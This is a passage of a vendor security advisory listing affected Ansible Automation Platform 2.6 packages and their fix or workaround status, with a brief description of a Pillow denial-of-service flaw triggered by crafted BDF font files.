| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library's image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
